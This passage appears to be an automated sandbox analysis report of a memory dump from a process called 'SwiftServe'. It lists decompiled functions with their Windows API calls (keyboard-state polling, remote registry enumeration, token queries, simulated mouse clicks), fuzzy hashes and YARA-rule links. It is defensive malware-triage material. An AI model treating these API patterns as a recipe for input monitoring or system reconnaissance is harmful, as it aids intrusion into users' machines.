Opcode Fuzzy Hash: 61935a0f07a0424fefa52127df34edf0a6df274b724d6c542e32f04554bfba0d
Instruction Fuzzy Hash: 58113C34900119DFCF00EF94D9618EEB7B4FF55344B10A4A9D9197B251EB366E0ADB50

Function 00E9F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E9F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E9F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E9F453
CloseHandle.KERNEL32(?), ref: 00E9F4D4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 9d707de3cad1556a51b7f6c5171d45d3972141e91dc50c8b5cddf05a7bfe63b6
Instruction ID: 79d821e94b357bb5c4edc92e340abf04bd94253f97d8650283aaa41e32b57db5
Opcode Fuzzy Hash: 9d707de3cad1556a51b7f6c5171d45d3972141e91dc50c8b5cddf05a7bfe63b6
Instruction Fuzzy Hash: 4C816FB16007109FD720EF29E846F2AB7E5AF44710F14992DF999EB2D2D770AC408F51

Function 00EA0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00EA147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA040D,?,?), ref: 00EA1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EA07E3
RegCloseKey.ADVAPI32(?,?), ref: 00EA080F
RegCloseKey.ADVAPI32(00000000), ref: 00EA081C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: f89a9584f199d16c48bbe9ff1aa55ca82a4339ac78b96c1262822d5b4f738ace
Instruction ID: 57f414217d04681103302e958b29ee3fa9efe43d2b0832b1b141fb7bd932a53e
Opcode Fuzzy Hash: f89a9584f199d16c48bbe9ff1aa55ca82a4339ac78b96c1262822d5b4f738ace
Instruction Fuzzy Hash: FC515971208204AFD704EF64C895E6BBBE9FF89304F04996DF595AB2A1DB30E904CB52

Function 00E8EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E8EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E8EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E8ECCA

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E8ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E8ECF7

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 74d23d80249b78edfc5f33055876b5a4b83741b0b7e22ddb33bd4ab5a8755aa9
Instruction ID: db82dc6cfd09b084da9a7168a0dd5a1bd53526519bf5383d40688308c36e9b6d
Opcode Fuzzy Hash: 74d23d80249b78edfc5f33055876b5a4b83741b0b7e22ddb33bd4ab5a8755aa9
Instruction Fuzzy Hash: 0C514775A00515DFCB01EF64D985AAEBBF5EF08314B1484A9E809BB3A2CB31ED45CF50

Function 00EAA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4ee045f72aa7545d217af3fad8e416f4abed811a19b71c336f15523e1824d81
Instruction ID: ddc7193ee8b83d2993bc1ba7bf1d53fc90240c2583ec0a3cd427274edf23cde1
Opcode Fuzzy Hash: c4ee045f72aa7545d217af3fad8e416f4abed811a19b71c336f15523e1824d81
Instruction Fuzzy Hash: BE41AC35900314AFD720DB28CC88FABBBB9AB0E314F191276F816BB291C770BD45DA51

Function 00E22714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E22727
ScreenToClient.USER32(00EE77B0,?), ref: 00E22744
GetAsyncKeyState.USER32(00000001), ref: 00E22769
GetAsyncKeyState.USER32(00000002), ref: 00E22777

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: cee297d484d73fb7f6039038e7cbefdd3073065a308feec9e8ad7389a24c2f23
Instruction ID: ca2d1ff6ea2e7082a16dfd29ac6a92dc75e689822ebd5c2b805b13ab4e8619aa
Opcode Fuzzy Hash: cee297d484d73fb7f6039038e7cbefdd3073065a308feec9e8ad7389a24c2f23
Instruction Fuzzy Hash: EB418F35508219FFCF159F68C844EE9BBB4FB06324F20935AF929B6290C730AD94DB91

Function 00E795D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00E795E8
PostMessageW.USER32(?,00000201,00000001), ref: 00E79692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E7969A
PostMessageW.USER32(?,00000202,00000000), ref: 00E796A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E796B0

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 22b1c3100b6fa97463de4bf4a90b352490332f1c1979eb5e6a01479694491442
Instruction ID: a1d6b4955c3fa2e4e8282ca657757fddd4f7d4c0d0670a0c93ff3b862841b6c7
Opcode Fuzzy Hash: 22b1c3100b6fa97463de4bf4a90b352490332f1c1979eb5e6a01479694491442
Instruction Fuzzy Hash: B731BC71900219EFDB14CFA8D94DA9E3BB5EF44315F108319F929AA2D1C3B0A924DB91

Function 00E7BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00E7BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E7BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E7BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E7BE18
_wcsstr.LIBCMT ref: 00E7BE22

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 943bd30e61d59291a6f1c70cfccf994ea5d01ce306bebd8913ead8908dad00f5
Instruction ID: 203d639d23c69cf25a416dedf1317edb73cee1047dc9f9835c1953b1d74d1ab4
Opcode Fuzzy Hash: 943bd30e61d59291a6f1c70cfccf994ea5d01ce306bebd8913ead8908dad00f5
Instruction Fuzzy Hash: 3B212932204208BFEB259B35AC09FBB7BDCDF44760F109029FA0DEA191EB61DC4092A0

Function 00EAB7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

GetWindowLongW.USER32(?,000000F0), ref: 00EAB804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EAB829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EAB841
GetSystemMetrics.USER32(00000004), ref: 00EAB86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E9155C,00000000), ref: 00EAB888

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 14b11e22762c3493527ac8a42a31aac9ed1990e1103c2f63be246f8ae7e826b0
Instruction ID: d0443a492ecdc6e4b73cdb28e8f7f8722e24fc2d3d354890e35da1f363dfb3e1
Opcode Fuzzy Hash: 14b11e22762c3493527ac8a42a31aac9ed1990e1103c2f63be246f8ae7e826b0
Instruction Fuzzy Hash: 1A219431914265AFCB289F3D9C04B6A37A9FB4A324F105739F921FB1E1D730A850CB90

Function 00E79EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E79ED8

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E79F0A
__itow.LIBCMT ref: 00E79F22
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E79F4A
__itow.LIBCMT ref: 00E79F5B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: b96a0a2537889554602d07684bab4183b03f54822d8b0d1309a5f8dc6efdef2d
Instruction ID: 7bb686224a97f58d1a114d04fb760dce210d89aa9a2bd349427f8bfb76435471
Opcode Fuzzy Hash: b96a0a2537889554602d07684bab4183b03f54822d8b0d1309a5f8dc6efdef2d
Instruction Fuzzy Hash: 3821D331701204AFDB159A658C8AEEF7BE8EF85710F04A069F908FB242D670D94587D1

Function 00E96138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00E96159
GetForegroundWindow.USER32 ref: 00E96170
GetDC.USER32(00000000), ref: 00E961AC
GetPixel.GDI32(00000000,?,00000003), ref: 00E961B8
ReleaseDC.USER32(00000000,00000003), ref: 00E961F3

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 3753155c41cf1d25bf87527e192c31b2403eb8a86887ce68eb21f9e54fba5898
Instruction ID: 1a29f17d6c46f247ca9d13fd0ef20341ce490375ad737285b1f659093e5efe05
Opcode Fuzzy Hash: 3753155c41cf1d25bf87527e192c31b2403eb8a86887ce68eb21f9e54fba5898
Instruction Fuzzy Hash: 8C21A475A016049FDB04EF65DD84A9BB7F5EF48350F048569E84AE7262CA30BC05CB90

Function 00E216CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E21729
SelectObject.GDI32(?,00000000), ref: 00E21738
BeginPath.GDI32(?), ref: 00E2174F
SelectObject.GDI32(?,00000000), ref: 00E21778

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 201bd24cad4bdb64b60c72583a9705939980a9506d63a1d1d9136cce848040fe
Instruction ID: c04a04f8393b1bd12d9765d8fc98755f67597dd61bec31fbd15d87985b418eec
Opcode Fuzzy Hash: 201bd24cad4bdb64b60c72583a9705939980a9506d63a1d1d9136cce848040fe
Instruction Fuzzy Hash: 1D21D63080836CEFDB109F66FC89B6E3BA8F761315F145356F855BA1A0D370995ACB84

Function 00E7C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00E7C84C
_memcmp.LIBCMT ref: 00E7C86A
_memcmp.LIBCMT ref: 00E7C87D
_memcmp.LIBCMT ref: 00E7C895
_memcmp.LIBCMT ref: 00E7C8AD

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 1c8708fc6f47d17973dcdc92a098e90ed4186e618d16f7303ff0b0d6ccc3b546
Instruction ID: b184a5ae1293d05836e27894857a7a229d1829c42926f7814df3876a79e5005b
Opcode Fuzzy Hash: 1c8708fc6f47d17973dcdc92a098e90ed4186e618d16f7303ff0b0d6ccc3b546
Instruction Fuzzy Hash: 7701F9626002153BF6186520EC83FFB775C9B20344F14A06DFE0AB6742F750FE1092E2

Function 00E8504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E85075
__beginthreadex.LIBCMT ref: 00E85093
MessageBoxW.USER32(?,?,?,?), ref: 00E850A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E850BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E850C5

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 8dcdb981776641e44bef260a6d8e7ade7c8f2695297b9a76b68be99c3ba7518c
Instruction ID: 57031ad723c9e0865dfead96727eb643fcf57a2f4da651c0941c19718a5a069c
Opcode Fuzzy Hash: 8dcdb981776641e44bef260a6d8e7ade7c8f2695297b9a76b68be99c3ba7518c
Instruction Fuzzy Hash: A91108B2908748BFC7019BA99C44ADB7FACAB49320F140355F918F73A0D6719D0887F1

Function 00E78E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E78E3C
GetLastError.KERNEL32(?,00E78900,?,?,?), ref: 00E78E46
GetProcessHeap.KERNEL32(00000008,?,?,00E78900,?,?,?), ref: 00E78E55
HeapAlloc.KERNEL32(00000000,?,00E78900,?,?,?), ref: 00E78E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E78E73

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 87b629878abd19af58e60b542eb3e4b62e38d2d8ac603516143f08b17a38b49f
Instruction ID: 97000de981aa3f8f76d62f54b22ccd8c7e5509f1861c4c05c3c7e5c387099371
Opcode Fuzzy Hash: 87b629878abd19af58e60b542eb3e4b62e38d2d8ac603516143f08b17a38b49f
Instruction Fuzzy Hash: 3D0181B0241204BFDB214FA6DD4DD6B7FADEF89754B104629F949E2220DB31EC14CA60

Function 00E857FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E8581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E85829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E85831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E8583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E85877

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: cd379108712c2057a78bc27228d2d1395834f8e9fbb3a5863473199390eb9548
Instruction ID: 2c5f28056ba5b3cda43a9613c965b71e9a5b20f52d312339018f00ad53bfb68f
Opcode Fuzzy Hash: cd379108712c2057a78bc27228d2d1395834f8e9fbb3a5863473199390eb9548
Instruction Fuzzy Hash: F5012132D01A1DDBDF08AFE9D8499DEBB78FB08711F40556AD509B2140DF30A558CBA1

Function 00E77D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E77C62,80070057,?,?,?,00E78073), ref: 00E77D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E77C62,80070057,?,?), ref: 00E77D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E77C62,80070057,?,?), ref: 00E77D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E77C62,80070057,?), ref: 00E77D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E77C62,80070057,?,?), ref: 00E77D8A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 2eb9676065d68a6daf57494bc1337ffb2d4ba2b5f5975e6cf3fdd3efed3bd894
Instruction ID: 1b8dd53f5bfa60e2aab3bfa2d928c9d5b96fc201556d76d4aa04ca165406e1f5
Opcode Fuzzy Hash: 2eb9676065d68a6daf57494bc1337ffb2d4ba2b5f5975e6cf3fdd3efed3bd894
Instruction Fuzzy Hash: 74019A72601214AFCB204F55DD04BAB7BADEF85792F109124FA48E2210E771EE008BA0

Function 00E78CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E78CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E78CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E78CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E78CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E78D14

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
